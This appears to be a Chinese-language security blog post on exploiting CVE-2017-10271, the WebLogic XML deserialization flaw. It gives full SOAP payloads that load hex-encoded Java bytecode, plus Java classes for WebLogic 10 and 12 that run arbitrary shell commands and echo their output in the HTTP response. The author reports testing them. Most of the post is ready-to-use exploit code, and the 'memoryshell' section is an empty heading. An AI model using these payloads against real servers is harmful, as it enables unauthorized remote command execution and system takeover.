weblogicEcho&&memoryshell

  1. 1. 字节码加载
  2. 2. ECHO
    1. 2.1. 12
    2. 2.2. 10
  3. 3. memoryshell

字节码加载

CVE-2017-10271是xml反序列化,可用如下poc加载字节码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java>
<void class="weblogic.utils.Hex" method="fromHexString" id="cls">
<string>hexString</string>
</void>
<void class="org.mozilla.classfile.DefiningClassLoader">
<void method="defineClass">
<string>类名</string>
<object idref="cls"></object>
<void method="newInstance">
</void>
</void>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

ECHO

12

10版本和12版本的回显不太一样

在网上找到的12版本的回显,去掉一些报错可以直接用了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
import java.io.PrintWriter;
import java.lang.reflect.Field;
import java.util.ArrayList;
import java.util.List;
import weblogic.servlet.internal.HttpConnectionHandler;
import weblogic.servlet.internal.ServletRequestImpl;
import weblogic.servlet.internal.ServletResponseImpl;
import weblogic.servlet.internal.WebAppServletContext;
import weblogic.work.ExecuteThread;
import weblogic.work.WorkAdapter;

public class XmlExp {
public XmlExp() {
}

public void say(String cmd) throws Exception {
ExecuteThread executeThread = (ExecuteThread)Thread.currentThread();
ServletResponseImpl servletResponse = null;
WorkAdapter workAdapter = executeThread.getCurrentWork();
WebAppServletContext webAppServletContext = null;
if (workAdapter.getClass().getName().contains("ContainerSupportProviderImpl")) {
Field field = workAdapter.getClass().getDeclaredField("connectionHandler");
field.setAccessible(true);
HttpConnectionHandler httpConnectionHandler = (HttpConnectionHandler)field.get(workAdapter);
webAppServletContext = httpConnectionHandler.getServletRequest().getContext();
servletResponse = httpConnectionHandler.getServletResponse();
}

String path = webAppServletContext.getRootTempDir().getAbsolutePath() + "/war/aa.txt";
if (cmd.equalsIgnoreCase("givemewlswarpath")) {
servletResponse.getWriter().write(path);
} else {
boolean isLinux = true;
String osTyp = System.getProperty("os.name");
if (osTyp != null && osTyp.toLowerCase().contains("win")) {
isLinux = false;
}

List cmds = new ArrayList();
PrintWriter printWriter = new PrintWriter(path + "x");
printWriter.println(path);
printWriter.close();
if (cmd.startsWith("$NO$")) {
cmds.add(cmd.substring(4));
} else if (isLinux) {
cmds.add("/bin/bash");
cmds.add("-c");
cmds.add(cmd);
} else {
cmds.add("cmd.exe");
cmds.add("/c");
cmds.add(cmd);
}

ProcessBuilder processBuilder = new ProcessBuilder(cmds);
processBuilder.redirectErrorStream(true);
Process proc = processBuilder.start();
servletResponse.getServletOutputStream().writeStream(proc.getInputStream());
servletResponse.getWriter().write("");
}
}
}

测试之后确实可以

1651999295519.png

1652011291410.png

weblogic.servlet.provider.ContainerSupportProviderImpl的内部类WlsRequestExecutor的cinnectionHandler属性为HttpConnectionHandler类实例

1652010802471.png

1652010829169.png

HttpConnectionHandler可以获取response

1652000522900.png

poc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java>
<void class="weblogic.utils.Hex" method="fromHexString" id="cls">
<string>0xcafebabe0000003400f90a003b006d0a006e006f0700700a000300710a003b00720a007300740800750a007600770800780a007300790a007a007b0a007a007c07007d0a000d007e0a007f00800a000d00810a007600820a007600830800840700850a0014006d0a008600870a008800890a0014008a08008b0a0014008c08008d0a0076008e0a008f00900a002500910800920a009300940a007600950800960700970a0023006d0700980800990a0025009a0a0025009b0a0025009c08009d0a0076009e0a0076009f0b00a000a10800a20800a30800a40800a50700a60a003200a70a003200a80a003200a90a008f00aa0a00ab00ac0a00ad00ae0800af0700b00700b10100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c65010004746869730100084c586d6c4578703b010003736179010015284c6a6176612f6c616e672f537472696e673b29560100056669656c640100194c6a6176612f6c616e672f7265666c6563742f4669656c643b01001568747470436f6e6e656374696f6e48616e646c65720100314c7765626c6f6769632f736572766c65742f696e7465726e616c2f48747470436f6e6e656374696f6e48616e646c65723b01000769734c696e75780100015a0100056f735479700100124c6a6176612f6c616e672f537472696e673b010004636d64730100104c6a6176612f7574696c2f4c6973743b01000b7072696e745772697465720100154c6a6176612f696f2f5072696e745772697465723b01000e70726f636573734275696c64657201001a4c6a6176612f6c616e672f50726f636573734275696c6465723b01000470726f630100134c6a6176612f6c616e672f50726f636573733b010003636d6401000d6578656375746554687265616401001d4c7765626c6f6769632f776f726b2f457865637574655468726561643b01000f736572766c6574526573706f6e736501002f4c7765626c6f6769632f736572766c65742f696e7465726e616c2f536572766c6574526573706f6e7365496d706c3b01000b776f726b4164617074657201001b4c7765626c6f6769632f776f726b2f576f726b416461707465723b010014776562417070536572766c6574436f6e746578740100304c7765626c6f6769632f736572766c65742f696e7465726e616c2f576562417070536572766c6574436f6e746578743b0100047061746801000d537461636b4d61705461626c650700b00700b20700700700b30700b40700b50700b607009801000a457863657074696f6e730700b70100104d6574686f64506172616d657465727301000a536f7572636546696c6501000b586d6c4578702e6a6176610c003c003d0700b80c00b900ba01001b7765626c6f6769632f776f726b2f457865637574655468726561640c00bb00bc0c00bd00be0700bf0c00c000c101001c436f6e7461696e6572537570706f727450726f7669646572496d706c0700b20c00c200c3010011636f6e6e656374696f6e48616e646c65720c00c400c50700c60c00c700c80c00c900ca01002f7765626c6f6769632f736572766c65742f696e7465726e616c2f48747470436f6e6e656374696f6e48616e646c65720c00cb00cc0700cd0c00ce00cf0c00d000d10c00d200c10c00d300d401000677686f616d690100176a6176612f6c616e672f537472696e674275696c6465720700b50c00d500d60700d70c00d800c10c00d900da01000b2f7761722f61612e7478740c00db00c1010010676976656d65776c73776172706174680c00dc00dd0700b30c00de00df0c00e000440100076f732e6e616d650700e10c00e200e30c00e400c101000377696e0100136a6176612f7574696c2f41727261794c6973740100136a6176612f696f2f5072696e74577269746572010001780c003c00440c00e500440c00e6003d010004244e4f240c00e700dd0c00e800e90700b60c00ea00eb0100092f62696e2f626173680100022d63010007636d642e6578650100022f630100186a6176612f6c616e672f50726f636573734275696c6465720c003c00ec0c00ed00ee0c00ef00f00c00f100f20700f30c00f400f50700f60c00f700f8010000010006586d6c4578700100106a6176612f6c616e672f4f626a6563740100106a6176612f6c616e672f537472696e6701002d7765626c6f6769632f736572766c65742f696e7465726e616c2f536572766c6574526573706f6e7365496d706c0100197765626c6f6769632f776f726b2f576f726b4164617074657201002e7765626c6f6769632f736572766c65742f696e7465726e616c2f576562417070536572766c6574436f6e7465787401000e6a6176612f7574696c2f4c6973740100136a6176612f6c616e672f457863657074696f6e0100106a6176612f6c616e672f54687265616401000d63757272656e7454687265616401001428294c6a6176612f6c616e672f5468726561643b01000e67657443757272656e74576f726b01001d28294c7765626c6f6769632f776f726b2f576f726b416461707465723b010008676574436c61737301001328294c6a6176612f6c616e672f436c6173733b01000f6a6176612f6c616e672f436c6173730100076765744e616d6501001428294c6a6176612f6c616e672f537472696e673b010008636f6e7461696e7301001b284c6a6176612f6c616e672f4368617253657175656e63653b295a0100106765744465636c617265644669656c6401002d284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f7265666c6563742f4669656c643b0100176a6176612f6c616e672f7265666c6563742f4669656c6401000d73657441636365737369626c65010004285a2956010003676574010026284c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b010011676574536572766c65745265717565737401003028294c7765626c6f6769632f736572766c65742f696e7465726e616c2f536572766c657452657175657374496d706c3b01002c7765626c6f6769632f736572766c65742f696e7465726e616c2f536572766c657452657175657374496d706c01000a676574436f6e7465787401003228294c7765626c6f6769632f736572766c65742f696e7465726e616c2f576562417070536572766c6574436f6e746578743b010012676574536572766c6574526573706f6e736501003128294c7765626c6f6769632f736572766c65742f696e7465726e616c2f536572766c6574526573706f6e7365496d706c3b0100047472696d0100066c656e67746801000328294901000e676574526f6f7454656d7044697201001028294c6a6176612f696f2f46696c653b01000c6a6176612f696f2f46696c6501000f6765744162736f6c75746550617468010006617070656e6401002d284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f537472696e674275696c6465723b010008746f537472696e67010010657175616c7349676e6f726543617365010015284c6a6176612f6c616e672f537472696e673b295a01000967657457726974657201001728294c6a6176612f696f2f5072696e745772697465723b01000577726974650100106a6176612f6c616e672f53797374656d01000b67657450726f7065727479010026284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f537472696e673b01000b746f4c6f776572436173650100077072696e746c6e010005636c6f736501000a73746172747357697468010009737562737472696e670100152849294c6a6176612f6c616e672f537472696e673b010003616464010015284c6a6176612f6c616e672f4f626a6563743b295a010013284c6a6176612f7574696c2f4c6973743b295601001372656469726563744572726f7253747265616d01001d285a294c6a6176612f6c616e672f50726f636573734275696c6465723b010005737461727401001528294c6a6176612f6c616e672f50726f636573733b010016676574536572766c65744f757470757453747265616d01003528294c7765626c6f6769632f736572766c65742f696e7465726e616c2f536572766c65744f757470757453747265616d496d706c3b0100116a6176612f6c616e672f50726f6365737301000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0100317765626c6f6769632f736572766c65742f696e7465726e616c2f536572766c65744f757470757453747265616d496d706c01000b777269746553747265616d010018284c6a6176612f696f2f496e70757453747265616d3b29560021003a003b0000000000020001003c003d0001003e0000003300010001000000052ab70001b100000002003f0000000a00020000000d0004000e00400000000c0001000000050041004200000001004300440003003e0000030e0004000d0000016db80002c000034d014e2cb600043a04013a051904b60005b600061207b600089900311904b600051209b6000a3a06190604b6000b19061904b6000cc0000d3a071907b6000eb6000f3a051907b600104e2bc6000d2bb60011b600129a000612134cbb001459b700151905b60016b60017b600181219b60018b6001a3a062b121bb6001c99000f2db6001d1906b6001ea700dd043607121fb800203a081908c600131908b600211222b60008990006033607bb002359b700243a09bb002559bb001459b700151906b600181226b60018b6001ab700273a0a190a1906b60028190ab600292b122ab6002b99001319092b07b6002cb9002d020057a7004515079900231909122eb9002d0200571909122fb9002d02005719092bb9002d020057a7002019091230b9002d02005719091231b9002d02005719092bb9002d020057bb0032591909b700333a0b190b04b6003457190bb600353a0c2db60036190cb60037b600382db6001d1239b6001eb100000003003f0000009a0026000000110007001200090013000f00140012001500220016002e00170034001800400019004a001a0050001d005e001e00610021007d0022008600230092002500950026009c002700ae002800b1002b00ba002c00d7002d00de002e00e3002f00ec003000fc003101010032010b00330115003401210036012b003701350038013e003b0149003c0150003d0157003e0163003f016c0041004000000098000f002e002200450046000600400010004700480007009500d70049004a0007009c00d0004b004c000800ba00b2004d004e000900d70095004f0050000a0149002300510052000b0157001500530054000c0000016d0041004200000000016d0055004c00010007016600560057000200090164005800590003000f015e005a005b00040012015b005c005d0005007d00f0005e004c0006005f000000510009ff0050000607006007006107006207006307006407006500000d02fc0030070061fd001e01070061fd004a070066070067241cff002d0007070060070061070062070063070064070065070061000000680000000400010069006a0000000501005500000001006b00000002006c</string>
</void>
<void class="org.mozilla.classfile.DefiningClassLoader">
<void method="defineClass">
<string>XmlExp</string>
<object idref="cls"></object>
<void method="newInstance">
<void method="say"><string>whoami</string></void>
</void>
</void>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
<asy:onAsyncDelivery/>
</soapenv:Body>
</soapenv:Envelope>

10

再去看看10版本的

貌似10版本只有10.3.6.0受影响

后来看到,似乎可以直接在xml里构造回显

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java>
<void class="weblogic.utils.Hex" method="fromHexString" id="cls">
<string>0xcafebabe0000003200670a001700350800360a003700380a0039003a08003b0a0039003c07003d0a0007003508003e0a0039003f0a003900400b004100420800430800440800450800460700470a001100480a001100490a0011004a0a004b004c07004d07004e0100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c650100047468697301001e4c636f6d2f737570657265616d2f6578706c6f6974732f586d6c4578703b010003736179010029284c6a6176612f6c616e672f537472696e673b294c6a6176612f696f2f496e70757453747265616d3b010003636d640100124c6a6176612f6c616e672f537472696e673b01000769734c696e75780100015a0100056f73547970010004636d64730100104c6a6176612f7574696c2f4c6973743b01000e70726f636573734275696c64657201001a4c6a6176612f6c616e672f50726f636573734275696c6465723b01000470726f630100134c6a6176612f6c616e672f50726f636573733b0100164c6f63616c5661726961626c65547970655461626c650100244c6a6176612f7574696c2f4c6973743c4c6a6176612f6c616e672f537472696e673b3e3b01000d537461636b4d61705461626c6507004f07005001000a457863657074696f6e7307005101000a536f7572636546696c6501000b586d6c4578702e6a6176610c001800190100076f732e6e616d650700520c0053005407004f0c0055005601000377696e0c005700580100136a6176612f7574696c2f41727261794c697374010004244e4f240c0059005a0c005b005c0700500c005d005e0100092f62696e2f626173680100022d63010007636d642e6578650100022f630100186a6176612f6c616e672f50726f636573734275696c6465720c0018005f0c006000610c006200630700640c0065006601001c636f6d2f737570657265616d2f6578706c6f6974732f586d6c4578700100106a6176612f6c616e672f4f626a6563740100106a6176612f6c616e672f537472696e6701000e6a6176612f7574696c2f4c6973740100136a6176612f6c616e672f457863657074696f6e0100106a6176612f6c616e672f53797374656d01000b67657450726f7065727479010026284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f537472696e673b01000b746f4c6f7765724361736501001428294c6a6176612f6c616e672f537472696e673b010008636f6e7461696e7301001b284c6a6176612f6c616e672f4368617253657175656e63653b295a01000a73746172747357697468010015284c6a6176612f6c616e672f537472696e673b295a010009737562737472696e670100152849294c6a6176612f6c616e672f537472696e673b010003616464010015284c6a6176612f6c616e672f4f626a6563743b295a010013284c6a6176612f7574696c2f4c6973743b295601001372656469726563744572726f7253747265616d01001d285a294c6a6176612f6c616e672f50726f636573734275696c6465723b010005737461727401001528294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0021001600170000000000020001001800190001001a0000002f00010001000000052ab70001b100000002001b00000006000100000007001c0000000c000100000005001d001e00000001001f00200002001a0000016f000300070000009c043d1202b800034e2dc600112db600041205b60006990005033dbb000759b700083a042b1209b6000a99001319042b07b6000bb9000c020057a700441c9900231904120db9000c0200571904120eb9000c02005719042bb9000c020057a700201904120fb9000c02005719041210b9000c02005719042bb9000c020057bb0011591904b700123a05190504b60013571905b600143a061906b60015b000000004001b0000004a001200000012000200130008001400180015001a00180023001a002c001b003c001c0040001d004a001e0054001f00600021006a002200740023007d002600880027008f002800960029001c0000004800070000009c001d001e00000000009c0021002200010002009a00230024000200080094002500220003002300790026002700040088001400280029000500960006002a002b0006002c0000000c0001002300790026002d0004002e000000110004fd001a0107002ffc0021070030231c0031000000040001003200010033000000020034</string>
</void>
<void class="org.mozilla.classfile.DefiningClassLoader">
<void method="defineClass">
<string>com.supeream.exploits.XmlExp</string>
<object idref="cls"></object>
<void method="newInstance">
<void method="say" id="proc">
<string>whoami</string>
</void>
</void>
</void>
</void>
<void class="java.lang.Thread" method="currentThread">
<void method="getCurrentWork">
<void method="getResponse">
<void method="getServletOutputStream">
<void method="writeStream">
<object idref="proc"></object>
</void>
<void method="flush"/>
</void>
<void method="getWriter"><void method="write"><string></string></void></void>
</void>
</void>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

但我想直接回显,之后遇到加载字节码的地方直接用。

按照12的思路调试之后发现10的版本回显似乎更简单

1652018316999.png

getCurrentWork直接获取到了ServletRequestImpl,所以可以编写恶意类了

(类型转换这里感觉有点怪怪的 但是能用就行)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
import java.io.InputStream;
import java.io.PrintWriter;
import java.lang.reflect.Field;
import java.util.ArrayList;
import java.util.List;
import java.lang.Thread;

import weblogic.servlet.internal.HttpConnectionHandler;
import weblogic.servlet.internal.ServletRequestImpl;
import weblogic.servlet.internal.ServletResponseImpl;
import weblogic.servlet.internal.WebAppServletContext;
import weblogic.work.ExecuteThread;
import weblogic.work.WorkAdapter;

public class XmlExp2 {
public XmlExp2() {
}

public void exp(String cmd) throws Exception {
ExecuteThread executeThread = (ExecuteThread) Thread.currentThread();
Object tmp = null;
WebAppServletContext webAppServletContext = null;
ServletRequestImpl servletRequest = null;
if (executeThread.getCurrentWork().getClass().getName().contains("ServletRequestImpl")) {
tmp = executeThread.getCurrentWork();
}
servletRequest = (ServletRequestImpl)tmp;
ServletResponseImpl servletResponse = servletRequest.getResponse();

if (cmd == null || cmd.trim().length() == 0) {
cmd = "whoami";
}

boolean isLinux = true;
String osTyp = System.getProperty("os.name");
if (osTyp != null && osTyp.toLowerCase().contains("win")) {
isLinux = false;
}

List cmds = new ArrayList();
if (cmd.startsWith("$NO$")) {
cmds.add(cmd.substring(4));
} else if (isLinux) {
cmds.add("/bin/bash");
cmds.add("-c");
cmds.add(cmd);
} else {
cmds.add("cmd.exe");
cmds.add("/c");
cmds.add(cmd);
}

ProcessBuilder processBuilder = new ProcessBuilder(cmds);
processBuilder.redirectErrorStream(true);
Process proc = processBuilder.start();
servletResponse.getServletOutputStream().writeStream(proc.getInputStream());
servletResponse.getWriter().write("");

}
}

1652020696499.png

memoryshell